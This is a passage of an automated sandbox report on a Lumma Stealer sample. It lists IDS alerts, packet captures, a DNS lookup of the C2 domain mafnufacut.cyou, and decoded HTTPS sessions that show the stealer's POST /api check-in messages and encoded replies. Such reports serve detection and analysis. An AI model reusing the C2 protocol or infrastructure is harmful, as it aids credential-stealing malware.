                                                                          .reloc0x4e0000xc0x200885d15258417db081de9b8be94cfb3ddFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x4c0a00x478data0.44143356643356646
                                                                          RT_MANIFEST0x4c5180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-10-31T14:06:57.494593+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711104.21.41.158443TCP
                                                                          2024-10-31T14:06:58.470442+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649711104.21.41.158443TCP
                                                                          2024-10-31T14:06:58.470442+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711104.21.41.158443TCP
                                                                          2024-10-31T14:06:59.156570+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.41.158443TCP
                                                                          2024-10-31T14:06:59.686199+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649712104.21.41.158443TCP
                                                                          2024-10-31T14:06:59.686199+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.41.158443TCP
                                                                          2024-10-31T14:07:00.649369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714104.21.41.158443TCP
                                                                          2024-10-31T14:07:02.067758+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715104.21.41.158443TCP
                                                                          2024-10-31T14:07:03.452181+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.21.41.158443TCP
                                                                          2024-10-31T14:07:05.365767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.41.158443TCP
                                                                          2024-10-31T14:07:06.542858+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724104.21.41.158443TCP
                                                                          2024-10-31T14:07:06.993386+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649724104.21.41.158443TCP
                                                                          2024-10-31T14:07:07.633124+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730104.21.41.158443TCP
                                                                          2024-10-31T14:07:08.115142+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649730104.21.41.158443TCP
                                                                          2024-10-31T14:07:13.468749+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.649756TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 31, 2024 14:06:56.656619072 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:56.656647921 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:56.656733990 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:56.660315990 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:56.660331011 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:57.494502068 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:57.494592905 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:57.689599991 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:57.689613104 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:57.689908028 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:57.738065958 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:57.839191914 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:57.839214087 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:57.839267015 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:58.470464945 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:58.470647097 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:58.470727921 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:58.473134041 CET49711443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:58.473144054 CET44349711104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:58.525705099 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:58.525738001 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:58.525815964 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:58.526113033 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:58.526125908 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.156486988 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.156569958 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.158492088 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.158499002 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.158720016 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.160222054 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.160284042 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.160299063 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686206102 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686244965 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686269999 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686306953 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686337948 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686363935 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686363935 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.686373949 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686405897 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.686554909 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.686599016 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.686605930 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.738230944 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.929222107 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929297924 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929332972 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929379940 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.929394007 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929441929 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.929625988 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929709911 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929776907 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.929858923 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.929867983 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:06:59.929881096 CET49712443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:06:59.929884911 CET44349712104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:00.021590948 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.021609068 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:00.021671057 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.022006989 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.022018909 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:00.649272919 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:00.649369001 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.650794029 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.650799990 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:00.651024103 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:00.652420044 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.652600050 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:00.652625084 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:01.344109058 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:01.344176054 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:01.344305038 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:01.344589949 CET49714443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:01.344600916 CET44349714104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:01.447390079 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:01.447422028 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:01.447515011 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:01.447916031 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:01.447937965 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.067682028 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.067758083 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.069294930 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.069308996 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.069561958 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.070755005 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.070894003 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.070926905 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.070981979 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.071002007 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.460407972 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.460479021 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.460531950 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.464251995 CET49715443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.464274883 CET44349715104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.843514919 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.843548059 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:02.843617916 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.843978882 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:02.843990088 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:03.452019930 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:03.452181101 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:03.453664064 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:03.453670025 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:03.453891039 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:03.455089092 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:03.455248117 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:03.455275059 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:03.455349922 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:03.455357075 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:04.082669020 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:04.082751036 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:04.082839012 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:04.083024979 CET49716443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:04.083035946 CET44349716104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:04.427027941 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:04.427057028 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:04.427130938 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:04.427617073 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:04.427624941 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.365690947 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.365767002 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.367418051 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.367427111 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.367799044 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.369086981 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.369199991 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.369206905 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.847348928 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.847613096 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.847683907 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.847848892 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.847860098 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.919291019 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.919329882 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.919404984 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.919780016 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.919790983 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.542700052 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.542857885 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.544337034 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.544347048 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.544589996 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.545986891 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.546091080 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.546097040 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.993411064 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.993516922 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.993609905 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.993895054 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.993908882 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.025181055 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.025233030 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.025330067 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.025697947 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.025715113 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.632977962 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.633124113 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.634674072 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.634685040 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.634926081 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.636575937 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.636634111 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.636670113 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115171909 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115277052 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115335941 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:08.115565062 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:08.115582943 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115593910 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:08.115598917 CET44349730104.21.41.158192.168.2.6

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 31, 2024 14:06:56.620754004 CET5802053192.168.2.61.1.1.1
                                                                          Oct 31, 2024 14:06:56.650975943 CET53580201.1.1.1192.168.2.6

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 31, 2024 14:06:56.620754004 CET192.168.2.61.1.1.10xf9aeStandard query (0)mafnufacut.cyouA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 31, 2024 14:06:56.650975943 CET1.1.1.1192.168.2.60xf9aeNo error (0)mafnufacut.cyou104.21.41.158A (IP address)IN (0x0001)false
                                                                          Oct 31, 2024 14:06:56.650975943 CET1.1.1.1192.168.2.60xf9aeNo error (0)mafnufacut.cyou172.67.148.54A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • mafnufacut.cyou

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649711104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:06:57 UTC262OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:06:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-10-31 13:06:58 UTC1008INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:06:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=1jnnvigrgs0btq0ajm7t4gbv2m; expires=Mon, 24-Feb-2025 06:53:37 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hO0lUHI9Mzk59W8LbwNWQiT9Sa%2BlgNzOcSKgQWcT8dTiOfQniGdUVePI6P17riedDk9TGIWly4vCo5vD17ublZez4qAMHLQrkafKrVUAp%2FMl3fDP8MBQIxX2LtWzBTJ6mjE%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3dd87e926e78a-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=2296590&cwnd=237&unsent_bytes=0&cid=ddf2cb317c32330a&ts=1211&x=0"
                                                                          2024-10-31 13:06:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                          Data Ascii: 2ok
                                                                          2024-10-31 13:06:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649712104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:06:59 UTC263OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 86
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:06:59 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35 31 37 61 64 64 30 37 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                          Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--17a9517add07&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                          2024-10-31 13:06:59 UTC1021INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:06:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=rhg2vkan6aot1utrj5e044qvi1; expires=Mon, 24-Feb-2025 06:53:38 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYU%2FBmUR3KmI9EYZUnJzIhA4mEaY%2B6GTEmNeqogZDJa%2F7rqJ%2BkeWSQYAm07%2BwkRoI1i1Eqf1P%2BGhzeJdhcm72IJH0k5g33bHStQiYcDoVuLvbEvl1gz%2BGtb%2F2dp%2B0BYX9Yg%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3dd905cb90b86-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1787&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2837&recv_bytes=985&delivery_rate=1789864&cwnd=222&unsent_bytes=0&cid=ee8b5edfada5e707&ts=535&x=0"
                                                                          2024-10-31 13:06:59 UTC348INData Raw: 34 32 65 34 0d 0a 72 79 2f 42 4a 63 4c 2f 4b 79 66 64 74 41 35 46 34 4a 71 52 51 68 67 48 54 6f 4c 65 74 4c 66 53 75 70 68 4c 37 44 32 73 61 7a 6e 55 44 62 63 48 2b 4d 73 48 42 61 37 52 4c 48 2b 47 2b 2f 30 78 66 53 74 73 34 37 71 57 6a 62 54 62 39 44 69 4a 45 59 34 64 56 49 30 56 70 30 53 75 6a 45 34 4c 2f 39 46 32 5a 39 72 42 36 6d 42 39 61 57 79 34 2f 4e 48 64 73 4e 76 30 4b 59 31 57 77 78 74 56 7a 45 65 74 51 71 71 61 53 45 4f 38 32 47 4d 67 68 66 2f 77 4b 48 5a 75 49 2b 71 7a 6c 70 76 77 33 2b 4a 70 31 68 2f 68 44 6b 33 4f 59 71 42 57 71 64 31 57 43 36 61 57 61 79 76 43 6f 4c 4d 6a 66 57 55 69 35 4c 72 66 33 37 72 53 2f 43 69 49 56 39 77 43 58 38 64 48 6f 30 47 72 6b 45 46 58 73 64 4a 6b 4b 34 50 31 38 47 41 30 4a 53 76 34 2f 49 36 56 34 2b 72 35 4f
                                                                          Data Ascii: 42e4ry/BJcL/KyfdtA5F4JqRQhgHToLetLfSuphL7D2saznUDbcH+MsHBa7RLH+G+/0xfSts47qWjbTb9DiJEY4dVI0Vp0SujE4L/9F2Z9rB6mB9aWy4/NHdsNv0KY1WwxtVzEetQqqaSEO82GMghf/wKHZuI+qzlpvw3+Jp1h/hDk3OYqBWqd1WC6aWayvCoLMjfWUi5Lrf37rS/CiIV9wCX8dHo0GrkEFXsdJkK4P18GA0JSv4/I6V4+r5O
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 30 56 34 30 47 75 6e 45 52 46 72 64 35 6e 4c 49 66 71 2b 43 6c 33 61 43 7a 74 74 74 6e 57 73 4e 2f 77 49 34 46 56 79 67 52 57 79 30 32 6a 42 2b 37 64 54 6c 33 2f 6a 69 77 45 68 2b 6a 30 4c 47 77 6e 46 71 43 6a 6d 4d 7a 77 33 2f 5a 70 31 68 2f 47 44 46 6a 4f 52 71 78 45 71 4a 5a 62 52 61 33 51 59 53 4b 51 2f 76 59 75 63 47 59 2b 36 72 4c 51 31 72 6e 54 38 79 79 4a 57 34 35 48 47 38 70 56 34 78 2f 67 76 45 52 4f 73 39 78 37 4a 38 4c 6e 76 54 6b 36 59 69 43 67 35 4a 62 52 73 64 7a 37 4c 59 42 52 79 67 56 64 77 30 43 73 51 61 71 64 54 6b 2b 33 33 6d 30 71 69 66 66 7a 4a 58 64 68 4b 75 79 39 30 35 58 2b 6d 50 30 78 7a 67 65 4f 4a 31 7a 4f 58 2b 46 79 6f 35 4e 48 51 71 6d 57 63 32 6d 62 75 50 51 73 4f 6a 31 73 37 72 6e 5a 78 37 48 4b 2f 79 65 63 55 38 73 50 56
                                                                          Data Ascii: 0V40GunERFrd5nLIfq+Cl3aCztttnWsN/wI4FVygRWy02jB+7dTl3/jiwEh+j0LGwnFqCjmMzw3/Zp1h/GDFjORqxEqJZbRa3QYSKQ/vYucGY+6rLQ1rnT8yyJW45HG8pV4x/gvEROs9x7J8LnvTk6YiCg5JbRsdz7LYBRygVdw0CsQaqdTk+33m0qiffzJXdhKuy905X+mP0xzgeOJ1zOX+Fyo5NHQqmWc2mbuPQsOj1s7rnZx7HK/yecU8sPV
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 79 6f 35 4e 48 51 71 6d 57 63 32 6d 62 75 50 51 73 4f 6a 31 73 37 4c 58 57 33 72 72 63 2b 69 36 44 57 73 30 4f 57 4d 42 4b 71 55 6d 6e 6d 55 56 4d 73 74 42 73 49 49 62 39 34 53 56 7a 61 53 43 67 38 70 62 53 71 4a 69 69 61 61 46 59 32 41 70 30 7a 6c 79 71 42 37 2f 54 55 41 57 34 32 69 78 2f 77 76 2f 32 4b 48 46 6a 4a 4f 43 75 30 39 75 37 32 66 41 76 6a 31 4c 43 44 31 76 4d 54 61 56 4c 6f 4a 70 4f 56 36 33 54 61 6a 57 49 75 4c 31 67 66 58 31 73 75 50 7a 67 78 61 66 4a 37 47 75 37 58 4d 41 48 58 4e 73 4e 76 41 6d 35 33 55 35 4a 2f 34 34 73 4c 49 4c 30 39 43 68 38 59 53 54 76 73 39 2f 48 73 64 54 30 4f 34 6c 66 78 77 64 55 77 55 53 75 51 4b 32 57 51 30 69 37 30 57 31 6e 7a 4c 6a 30 4f 44 6f 39 62 4e 61 73 32 39 6d 65 30 2f 59 67 7a 6b 43 41 45 42 76 4b 51 65
